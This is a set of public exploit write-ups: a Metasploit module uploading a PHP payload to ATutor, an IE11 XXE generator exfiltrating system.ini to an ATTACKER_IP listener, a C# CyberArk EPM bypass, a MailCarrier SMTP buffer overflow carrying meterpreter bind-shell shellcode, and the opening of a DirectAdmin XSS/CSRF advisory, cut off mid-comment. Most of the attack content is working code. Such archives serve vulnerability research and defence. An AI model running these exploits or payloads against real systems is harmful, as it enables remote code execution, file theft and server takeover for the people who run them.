##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # NOTE(review): FileDropper is mixed in, but nothing in this file calls
  # register_file_for_cleanup, so the uploaded file is left on the target
  # after the session ends (a persistent artefact responders can look for).
  include Msf::Exploit::FileDropper

  # Module metadata and datastore options.
  #
  # TARGETURI    base path of the ATutor install
  # USERNAME /   credentials of a teacher account (login ends the run if the
  # PASSWORD     account turns out to be an administrator, see `login`)
  # CONTENT_DIR  content folder, relative to TARGETURI; used by `check` and
  #              by `exec_payload` to reach the uploaded file
  def initialize(info={})
    super(update_info(info,
      'Name' => "ATutor < 2.2.4 'file_manager' Remote Code Execution",
      'Description' => %q{
This module allows the user to run commands on the server with teacher user privilege.
The 'Upload files' section in the 'File Manager' field contains arbitrary file upload vulnerability.
The "$IllegalExtensions" function has control weakness and shortcomings.
It is possible to see illegal extensions within "constants.inc.php". (exe|asp|php|php3|php5|cgi|bat...)
However, there is no case-sensitive control. Therefore, it is possible to bypass control with filenames such as ".phP", ".Php"
It can also be used in dangerous extensions such as "shtml" and "phtml".
The directory path for the "content" folder is located at "config.inc.php".
For the exploit to work, the "define ('AT_CONTENT_DIR', 'address')" content folder must be located in the web home directory or the address must be known.
This exploit creates a course with the teacher user and loads the malicious php file into server.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & MSF Module
        ],
      'References' =>
        [
          [ 'CVE', '' ], # NOTE(review): empty identifier; no CVE is given on this page
          [ 'URL', 'http://pentest.com.tr/exploits/ATutor-2-2-4-file-manager-Remote-Code-Execution-Injection-Metasploit.html' ],
          [ 'URL', 'https://atutor.github.io/' ],
          [ 'URL', 'http://www.atutor.ca/' ]
        ],
      'Privileged' => false,
      'Payload' =>
        {
          'DisableNops' => true,
        },
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' => [[ 'Automatic', { }]],
      'DisclosureDate' => '09 April 2019',
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
        OptString.new('USERNAME', [true, 'The Teacher Username to authenticate as']),
        OptString.new('PASSWORD', [true, 'The Teacher password to authenticate with']),
        OptString.new('CONTENT_DIR', [true, 'The content folder location', 'content'])
      ],self.class)
  end

  # Requests <TARGETURI>/<CONTENT_DIR>/<@course_id>/<@fn> so the server
  # executes the uploaded file. @course_id is set by create_course and @fn by
  # upload_shell; with either unset the URI is built from nil.
  # The response is not inspected.
  def exec_payload
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "#{datastore['CONTENT_DIR']}", @course_id, "#{@fn}")
    })
  end

  # "scheme://rhost:rport" prefix used in log lines and Referer headers.
  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  # The three print_* overrides below prefix every message with `peer`.
  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def print_error(msg='')
    super("#{peer} - #{msg}")
  end

  def print_good(msg='')
    super("#{peer} - #{msg}")
  end

  ##
  # Version and Vulnerability Check
  ##
  # Despite the banner, no version is read: the check only asks whether
  # <TARGETURI>/<CONTENT_DIR>/ answers with something other than 404.
  # Returns Unknown when no response arrives, Safe on 404, Appears otherwise.
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "#{datastore['CONTENT_DIR']}/")
    })
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end
    if res.code == 404
      return Exploit::CheckCode::Safe
    end
    return Exploit::CheckCode::Appears
  end

  ##
  # csrftoken read and create a new course
  ##
  # Fetches create_course.php with the session cookie, scrapes the csrftoken
  # hidden field, then POSTs a multipart form creating a course with a random
  # 5-letter lower-case title. On success sets @token, @course_name and
  # @course_id (parsed from the bounce.php redirect) and returns true;
  # returns false when the form page or the redirect does not look as
  # expected. The `check` parameter is accepted but never used.
  def create_course(cookie, check)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "mods", "_core", "courses", "users", "create_course.php"),
      'headers' =>
      {
        'Referer' => "#{peer}#{datastore['TARGETURI']}users/index.php",
        'cookie' => cookie,
      },
      'agent' => 'Mozilla'
    })
    if res && res.code == 200 && res.body =~ /Create Course: My Start Pag/
      @token = res.body.split('csrftoken" value="')[1].split('"')[0]
    else
      return false
    end
    @course_name = Rex::Text.rand_text_alpha_lower(5)
    post_data = Rex::MIME::Message.new
    post_data.add_part(@token, nil, nil,'form-data; name="csrftoken"')
    post_data.add_part('true', nil, nil, 'form-data; name="form_course"')
    post_data.add_part(@course_name, nil, nil, 'form-data; name="title"')
    post_data.add_part('top', nil, nil, 'form-data; name="content_packaging"')
    post_data.add_part('protected', nil, nil, 'form-data; name="access"')
    post_data.add_part('Save', nil, nil, 'form-data; name="submit"')
    data = post_data.to_s
    res = send_request_cgi({
      'method' => 'POST',
      'data' => data,
      'agent' => 'Mozilla',
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "mods", "_core", "courses", "users", "create_course.php")
    })
    # NOTE(review): res is dereferenced here before the `res &&` guard on the
    # next line, so a dropped connection raises NoMethodError on nil instead
    # of returning false.
    location = res.redirection.to_s
    if res && res.code == 302 && location.include?('bounce.php?course')
      @course_id = location.split('course=')[1].split("&p")[0]
      return true
    else
      return false
    end
  end

  ##
  # Upload malicious file // payload integration
  ##
  # Enters the course created by create_course (GET bounce.php?course=<id>),
  # re-captures the ATutorID cookie the server hands back, then POSTs the
  # payload as a multipart upload to mods/_core/file_manager/upload.php under
  # a random 8-letter name ending in ".phP" (the mixed-case extension is the
  # bypass described in the module description). Sets @fn to that file name;
  # returns true when the server answers 302 to index.php?pathext, false
  # otherwise. `check` is unused.
  def upload_shell(cookie, check)
    # NOTE(review): String + nil raises TypeError here when create_course
    # failed and @course_id was never set; `exploit` does not stop in that case.
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "bounce.php?course=" + @course_id),
      'headers' =>
      {
        'Referer' => "#{peer}#{datastore['TARGETURI']}users/index.php",
        'cookie' => cookie,
      },
      'agent' => 'Mozilla'
    })
    # NOTE(review): res is not nil-checked before get_cookies; ucookie stays
    # nil when the two-cookie pattern does not match and the POST below then
    # goes out without a cookie. `$2` is the second ATutorID value.
    ucookie = "ATutorID=#{$2};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*);/
    file_name = Rex::Text.rand_text_alpha_lower(8) + ".phP"
    @fn = "#{file_name}"
    post_data = Rex::MIME::Message.new
    post_data.add_part('10485760', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
    post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"uploadedfile\"; filename=\"#{file_name}\"")
    post_data.add_part('Upload', nil, nil, 'form-data; name="submit"')
    post_data.add_part('', nil, nil, 'form-data; name="pathext"')
    data = post_data.to_s
    res = send_request_cgi({
      'method' => 'POST',
      'data' => data,
      'agent' => 'Mozilla',
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => ucookie,
      'uri' => normalize_uri(target_uri.path, "mods", "_core", "file_manager", "upload.php")
    })
    if res && res.code == 302 && res.redirection.to_s.include?('index.php?pathext')
      # NOTE(review): this status line is printed after the upload request has
      # already completed, so its wording is misleading.
      print_status("Trying to upload #{file_name}")
      return true
    else
      print_status("Error occurred during uploading!")
      return false
    end
  end

  ##
  # Password encryption with csrftoken
  ##
  # Builds the value the login form expects in form_password_hidden:
  # SHA1(password + token) when `check` is true, SHA1(SHA1(password) + token)
  # otherwise. `exploit` calls login with check=false, so only the second
  # form is exercised by this module. Plain SHA1 over the token; no other input.
  def get_hashed_password(token, password, check)
    if check
      return Rex::Text.sha1(password + token)
    else
      return Rex::Text.sha1(Rex::Text.sha1(password) + token)
    end
  end

  ##
  # User login operations
  ##
  # Authenticates as `username`/`password` and returns a cookie string of the
  # form "ATutorID=<value>;" for the resulting session.
  #   1. GET login.php; the token is scraped from inline script text with the
  #      regex below and the ATutorID cookie from the Set-Cookie headers.
  #   2. POST login.php with form_password_hidden = get_hashed_password(...).
  #   3. Follow the bounce.php?course=0 redirect and then the users/index.php
  #      redirect, refreshing the cookie from each response.
  # Any other outcome ends the run via fail_with(Failure::NoAccess), so the
  # trailing `return nil` is never reached.
  # NOTE(review): res from the first two requests is used without a nil
  # check; `$1`/`$2` are the last-match globals, so each regex has to run
  # immediately before the line that reads them (as it does here).
  def login(username, password, check)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "login.php"),
      'agent' => 'Mozilla',
    })
    token = $1 if res.body =~ /\) \+ \"(.*)\"\);/
    cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
    if check
      password = get_hashed_password(token, password, true)
    else
      password = get_hashed_password(token, password, false)
    end
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, "login.php"),
      'vars_post' => {
        'form_password_hidden' => password,
        'form_login' => username,
        'submit' => 'Login'
      },
      'cookie' => cookie,
      'agent' => 'Mozilla'
    })
    cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/
    if res && res.code == 302
      if res.redirection.to_s.include?('bounce.php?course=0')
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, res.redirection),
          'cookie' => cookie,
          'agent' => 'Mozilla'
        })
        cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
        if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
          res = send_request_cgi({
            'method' => 'GET',
            'uri' => normalize_uri(target_uri.path, res.redirection),
            'cookie' => cookie,
            'agent' => 'Mozilla'
          })
          cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
          return cookie
        end
      # NOTE(review): `else` followed by an expression on the same line is not
      # `elsif`: the include?('admin/index.php') result is evaluated and
      # discarded, so every 302 that is not to bounce.php?course=0 is reported
      # as "The account is the administrator". `elsif` was presumably intended.
      else res.redirection.to_s.include?('admin/index.php')
        fail_with(Failure::NoAccess, 'The account is the administrator. Please use a teacher account!')
        return cookie
      end
    end
    fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
    return nil
  end

  ##
  # Exploit controls and information
  ##
  # Driver: log in (bad credentials end the run inside login), create a
  # course, upload the payload file into it, then request it.
  # NOTE(review): a false return from create_course is not fatal here; the
  # run continues into upload_shell with @course_id nil, where the string
  # concatenation raises TypeError.
  def exploit
    tcookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    print_good("Logged in as #{datastore['USERNAME']}")
    if create_course(tcookie, true)
      print_status("CSRF Token : " + @token)
      print_status("Course Name : " + @course_name + " Course ID : " + @course_id)
      print_good("New course successfully created.")
    end
    if upload_shell(tcookie, true)
      print_good("Upload successfully.")
      print_status("Trying to exec payload...")
      exec_payload
    end
  end
end
##
# The end of the adventure (o_O) // AkkuS
##
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Internet Explorer v11
(latest version)
Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.
[Vulnerability Type]
XML External Entity Injection
[CVE Reference]
N/A
[Security Issue]
Internet Explorer is vulnerable to XML External Entity attack if a user opens a specially crafted .MHT file locally.
This can allow remote attackers to potentially exfiltrate local files and conduct remote reconnaissance of locally installed
program version information. For example, a request for "c:\Python27\NEWS.txt" can return version information for that program.
Upon opening the malicious ".MHT" file locally it should launch Internet Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
and other interactions like right click "Print Preview" or "Print" commands on the web-page may also trigger the XXE vulnerability.
However, a simple call to the window.print() Javascript function should do the trick without requiring any user interaction with the webpage.
Importantly, if files are downloaded from the web in a compressed archive and opened using certain archive utilities, MOTW (Mark of the Web) may not work as advertised.
Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" users will get a security warning bar in IE and be prompted
to activate blocked content. However, when opening a specially crafted .MHT file using malicious <xml> markup tags the user will get no such
active content or security bar warnings.
e.g.
C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 -
Tested successfully in latest Internet Explorer Browser v11 with latest security patches on Win7/10 and Server 2012 R2.
[POC/Video URL]
https://www.youtube.com/watch?v=fbLNbCjgJeY
[Exploit/POC]
POC to exfil Windows "system.ini" file.
Note: Edit attacker server IP in the script to suit your needs.
1) Use below script to create the "datatears.xml" XML and XXE embedded "msie-xxe-0day.mht" MHT file.
2) python -m SimpleHTTPServer
3) Place the generated "datatears.xml" in Python server web-root.
4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated.
#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx
#ApparitionSec
# Listener that both generated files point at; the advisory above says to
# edit this to suit. PORT is kept as a string because it is only ever
# concatenated into URLs.
ATTACKER_IP="localhost"
PORT="8000"

# Contents of msie-xxe-0day.mht (a MIME-HTML document with one text/html
# part). The inline <xml> block declares a parameter entity "sp" that is
# loaded from http://ATTACKER_IP:PORT/datatears.xml, expands %sp; and
# %param1; (the latter is declared inside datatears.xml, see xml_file below)
# and then references &exfil; four times. The <script> calls window.print(),
# which the advisory text above says triggers the behaviour without user
# interaction. Everything else is presentational.
mht_file=(
    'From:\n'
    'Subject:\n'
    'Date:\n'
    'MIME-Version: 1.0\n'
    'Content-Type: multipart/related; type="text/html";\n'
    '\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"\n'
    'This is a multi-part message in MIME format.\n\n\n'
    '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n'
    'Content-Type: text/html; charset="UTF-8"\n'
    'Content-Location: main.htm\n\n'
    '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd">\n'
    '<html>\n'
    '<head>\n'
    '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n'
    '<title>MSIE XXE 0day</title>\n'
    '</head>\n'
    '<body>\n'
    '<xml>\n'
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<!DOCTYPE r [\n'
    '<!ELEMENT r ANY >\n'
    '<!ENTITY % sp SYSTEM "http://'+str(ATTACKER_IP)+":"+PORT+'/datatears.xml">\n'
    '%sp;\n'
    '%param1;\n'
    ']>\n'
    '<r>&exfil;</r>\n'
    '<r>&exfil;</r>\n'
    '<r>&exfil;</r>\n'
    '<r>&exfil;</r>\n'
    '</xml>\n'
    '<script>window.print();</script>\n'
    '<table cellpadding="0" cellspacing="0" border="0">\n'
    '<tr>\n'
    '<td class="contentcell-width">\n'
    '<h1>MSIE XML External Entity 0day PoC.</h1>\n'
    '<h3>Discovery: hyp3rlinx</h3>\n'
    '<h3>ApparitionSec</h3>\n'
    '</td>\n'
    '</tr>\n'
    '</table>\n'
    '</body>\n'
    '</html>\n\n\n'
    '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--'
)

# Contents of datatears.xml, served from ATTACKER_IP:PORT. It declares the
# parameter entity "data" as the contents of c:\windows\system.ini and
# "param1" as a nested declaration of the general entity "exfil", an HTTP URL
# back to ATTACKER_IP:PORT whose query string is the expansion of %data;.
# The pair is declared twice, once with a bare drive path and once with a
# file:/// URL -- presumably so that whichever form the parser accepts is
# used; TODO confirm.
# Note these are non-raw Python strings: "\w" and "\s" are not escape
# sequences, so the backslashes survive into the output.
xml_file=(
    '<!ENTITY % data SYSTEM "c:\windows\system.ini">\n'
    '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://'+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
    '<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">\n'
    '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://'+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
)
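def mk_msie_0day_filez(f,p):
    """Write ``p`` verbatim to the file at path ``f``, truncating any existing file.

    Args:
        f: destination path.
        p: contents to write. The file is opened in binary mode, so this is
           a ``str`` on Python 2 (which is what the callers pass) and
           ``bytes`` on Python 3.

    Raises:
        IOError/OSError: if the file cannot be opened for writing.
    """
    # The context manager closes the handle even when write() raises; the
    # original rebound the ``f`` parameter to the handle, which is avoided
    # here so the path stays available for error reporting.
    with open(f, "wb") as out:
        out.write(p)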
if __name__ == "__main__":
    # Writes both artefacts into the current working directory and prints a
    # banner. Python 2 print statements: this script does not run on 3.x.
    mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
    mk_msie_0day_filez("datatears.xml",xml_file)
    print "Microsoft Internet Explorer XML External Entity 0day PoC."
    print "Files msie-xxe-0day.mht and datatears.xml Created!."
    print "Discovery: Hyp3rlinx / Apparition Security"
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: March 27, 2019
Vendor acknowledgement: March 27, 2019
Case Opened: March 28, 2019
MSRC response April 10, 2019: "We determined that a fix for this issue will be considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
April 10, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: CyberArk Endpoint bypass
# Google Dork: -
# Date: 03/06/2018
# Exploit Author: Alpcan Onaran, Mustafa Kemal Can
# Vendor Homepage: https://www.cyberark.com
# Software Link: -
# Version: 10.2.1.603
# Tested on: Windows 10
# CVE : CVE-2018-14894
//If a user needs admin privileges, CyberArk gives the admin token to the user for a specific process, not for the whole system. It is a cool idea.
//This product also has a function called “Application Blacklist”. You probably know what that means.
//It lets the CyberArk admin block execution of specified applications. Normally, you cannot start such a process even with admin rights.
//But we found a very interesting trick that makes CyberArk completely blind. All you need to do is revoke the SYSTEM account's read privilege on the file you want to open.
//After you do that, CyberArk EPM cannot get information about the blocked file and simply lets it execute.
This exploit works on CyberArk EPM 10.2.1.603 and below. (Tested on Windows 10 x64)
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System;
using System.IO;
using System.Security.AccessControl;
namespace raceagainstthesystem
{
    // WinForms front end for the advisory above. The designer-generated
    // members it relies on (InitializeComponent, txt_filepath, the two
    // buttons' wiring) live in the partial-class file that is not part of
    // this listing.
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        // Adds an explicit Deny ACE for ReadData, granted against the
        // "SYSTEM" account, to the DACL of the file named in txt_filepath and
        // writes the descriptor back. This is the whole technique: the
        // advisory's premise is that EPM can no longer read the file and
        // therefore does not block it.
        //
        // NOTE(review): File.SetAccessControl is called twice with the same
        // FileSecurity object; the second call re-applies an unchanged
        // descriptor and is redundant. The commented-out RemoveAccessRule
        // block is dead code. txt_filepath.Text is not validated;
        // GetAccessControl throws when the path is missing or inaccessible,
        // and nothing here catches it.
        // From a defensive angle, a Deny ACE against SYSTEM on an executable
        // is an unusual DACL state that can be audited for.
        private void btn_change_access_control_Click(object sender, EventArgs e)
        {
            string fileName = txt_filepath.Text;
            FileSecurity fSecurity = File.GetAccessControl(fileName);
            fSecurity.AddAccessRule(new FileSystemAccessRule(@"SYSTEM",
                FileSystemRights.ReadData, AccessControlType.Deny));
            File.SetAccessControl(fileName, fSecurity);
            /*
            fSecurity.RemoveAccessRule(new FileSystemAccessRule(@"SYSTEM",
            FileSystemRights.ReadData, AccessControlType.Allow));
            */
            File.SetAccessControl(fileName, fSecurity);
        }

        // Lets the user pick a file and copies its path into txt_filepath.
        // NOTE(review): Multiselect is enabled but only FileName (the first
        // selection) is used; arrAllFiles is assigned and never read. On
        // Cancel the text box is cleared to "".
        private void btn_choseFile_Click(object sender, System.EventArgs e)
        {
            OpenFileDialog choofdlog = new OpenFileDialog();
            choofdlog.Filter = "All Files (*.*)|*.*";
            choofdlog.FilterIndex = 1;
            choofdlog.Multiselect = true;
            string sFileName = "";
            if (choofdlog.ShowDialog() == DialogResult.OK)
            {
                sFileName = choofdlog.FileName;
                string[] arrAllFiles = choofdlog.FileNames; //used when Multiselect = true
            }
            txt_filepath.Text = sFileName;
        }
    }
}
#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote)
# Date: 12/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
#0x7e4456f7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
#POC
#1.) Change ip and port in code
#2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
import sys
import socket
import time
#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
# Output of the msfvenom command quoted in the comment above (bind_tcp
# meterpreter on port 443, alpha_mixed encoded so the listed bad characters
# do not appear). Kept verbatim.
shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
             "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
             "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
             "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
             "\x79\x6c\x6a\x48\x4d\x52\x57\x70\x45\x50\x65\x50\x55\x30\x6e"
             "\x69\x6a\x45\x55\x61\x39\x50\x32\x44\x4e\x6b\x76\x30\x44\x70"
             "\x4e\x6b\x42\x72\x76\x6c\x6c\x4b\x51\x42\x47\x64\x6e\x6b\x44"
             "\x32\x44\x68\x56\x6f\x4c\x77\x43\x7a\x57\x56\x34\x71\x6b\x4f"
             "\x6c\x6c\x37\x4c\x73\x51\x61\x6c\x75\x52\x74\x6c\x35\x70\x49"
             "\x51\x68\x4f\x76\x6d\x56\x61\x6a\x67\x4a\x42\x7a\x52\x62\x72"
             "\x53\x67\x4c\x4b\x72\x72\x54\x50\x4c\x4b\x63\x7a\x75\x6c\x4e"
             "\x6b\x70\x4c\x72\x31\x73\x48\x4b\x53\x31\x58\x63\x31\x68\x51"
             "\x43\x61\x6e\x6b\x72\x79\x77\x50\x46\x61\x5a\x73\x6e\x6b\x32"
             "\x69\x64\x58\x6d\x33\x35\x6a\x32\x69\x4e\x6b\x67\x44\x4c\x4b"
             "\x75\x51\x39\x46\x30\x31\x69\x6f\x4c\x6c\x4f\x31\x6a\x6f\x64"
             "\x4d\x36\x61\x79\x57\x74\x78\x4d\x30\x32\x55\x7a\x56\x75\x53"
             "\x73\x4d\x48\x78\x67\x4b\x61\x6d\x64\x64\x74\x35\x6b\x54\x72"
             "\x78\x6e\x6b\x71\x48\x54\x64\x33\x31\x38\x53\x72\x46\x4c\x4b"
             "\x44\x4c\x50\x4b\x6e\x6b\x71\x48\x55\x4c\x65\x51\x48\x53\x4e"
             "\x6b\x54\x44\x4e\x6b\x76\x61\x5a\x70\x6f\x79\x57\x34\x76\x44"
             "\x46\x44\x61\x4b\x31\x4b\x63\x51\x50\x59\x50\x5a\x32\x71\x79"
             "\x6f\x59\x70\x51\x4f\x71\x4f\x70\x5a\x6e\x6b\x34\x52\x68\x6b"
             "\x6c\x4d\x33\x6d\x53\x58\x74\x73\x44\x72\x67\x70\x53\x30\x52"
             "\x48\x52\x57\x53\x43\x36\x52\x53\x6f\x61\x44\x50\x68\x72\x6c"
             "\x31\x67\x55\x76\x64\x47\x6b\x4f\x78\x55\x68\x38\x6c\x50\x67"
             "\x71\x63\x30\x45\x50\x64\x69\x4f\x34\x62\x74\x50\x50\x72\x48"
             "\x54\x69\x4f\x70\x42\x4b\x67\x70\x49\x6f\x6e\x35\x50\x6a\x46"
             "\x6b\x56\x39\x62\x70\x78\x62\x79\x6d\x42\x4a\x53\x31\x61\x7a"
             "\x56\x62\x43\x58\x49\x7a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x79"
             "\x45\x4f\x67\x73\x58\x56\x62\x57\x70\x67\x71\x4f\x4b\x4b\x39"
             "\x4b\x56\x50\x6a\x56\x70\x66\x36\x63\x67\x62\x48\x4a\x62\x6b"
             "\x6b\x67\x47\x55\x37\x6b\x4f\x5a\x75\x6f\x75\x49\x50\x33\x45"
             "\x53\x68\x53\x67\x31\x78\x6f\x47\x6b\x59\x70\x38\x49\x6f\x59"
             "\x6f\x38\x55\x66\x37\x33\x58\x61\x64\x68\x6c\x65\x6b\x38\x61"
             "\x79\x6f\x4b\x65\x66\x37\x4e\x77\x52\x48\x73\x45\x62\x4e\x62"
             "\x6d\x65\x31\x79\x6f\x7a\x75\x70\x6a\x55\x50\x73\x5a\x36\x64"
             "\x71\x46\x56\x37\x72\x48\x56\x62\x38\x59\x4b\x78\x61\x4f\x69"
             "\x6f\x69\x45\x4f\x73\x5a\x58\x63\x30\x51\x6e\x66\x4d\x4e\x6b"
             "\x74\x76\x72\x4a\x47\x30\x51\x78\x57\x70\x76\x70\x63\x30\x65"
             "\x50\x33\x66\x50\x6a\x37\x70\x30\x68\x31\x48\x49\x34\x51\x43"
             "\x5a\x45\x49\x6f\x59\x45\x4e\x73\x76\x33\x70\x6a\x33\x30\x76"
             "\x36\x52\x73\x53\x67\x52\x48\x66\x62\x6e\x39\x58\x48\x33\x6f"
             "\x69\x6f\x4a\x75\x4d\x53\x7a\x58\x43\x30\x73\x4e\x73\x37\x47"
             "\x71\x58\x43\x77\x59\x49\x56\x52\x55\x6d\x39\x5a\x63\x4f\x4b"
             "\x68\x70\x6e\x55\x6e\x42\x63\x66\x33\x5a\x33\x30\x50\x53\x69"
             "\x6f\x58\x55\x41\x41")
# Buffer layout: 5090 bytes of filler, the 4-byte return address from the
# header comment (0x7e4456f7 written little-endian), a 20-byte NOP sled, the
# shellcode, then 100 bytes of trailing filler.
buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 20 + shellcode + "B" * 100
print "[*] Sending pwnage buffer: with %s bytes" %len(buffer)
# Target host and port are hard-coded, as the header says ("Change ip and
# port in code"). Python 2: strings are bytes, so send() accepts them as is.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# NOTE(review): connect() returns None, so ``connect`` is never meaningful;
# ``sys`` is imported but unused. No timeout is set on the socket, so each
# recv() can block indefinitely.
connect=s.connect(("192.168.0.150", 25))
print s.recv(1024)
# Ordinary SMTP dialogue up to RCPT TO, whose argument carries the buffer.
s.send('EHLO root@telspace.co.za \r\n')
print s.recv(1024)
s.send('MAIL FROM: pwnz@telspace.co.za \r\n')
print s.recv(1024)
s.send('RCPT TO: '+ buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
# Reached only if every recv() returned, i.e. the service stayed up.
print "[*] Done, but if you get here the exploit failed!"
# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561
# Date: 12.04.2019
# Author: InfinitumIT
# Vendor Homepage: https://www.directadmin.com/
# Version: Up to v1.561.
# CVE: CVE-2019-11193
# info@infinitumit.com.tr && infinitumit.com.tr
# Description:
# Multiple security vulnerabilities have been discovered in the popular server control panel DirectAdmin by
# InfinitumIT. Attackers can combine these vulnerabilities to perform critical actions such as server takeover.
# These vulnerabilities (Cross Site Scripting and Cross Site Request Forgery) can be chained to:
# add an administrator, execute remote commands (RCE), take a full backup of the server and upload it to the attacker's own server, upload a webshell, and more.
# Reflected XSS Vulnerabilities:
# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD
# Example Payloads:
# Add Administrator:
// CSRF proof of concept from the advisory: a cross-origin POST to
// CMD_ACCOUNT_ADMIN that creates an admin account using the victim's own
// session cookie. It succeeds only because, per the advisory, the endpoint
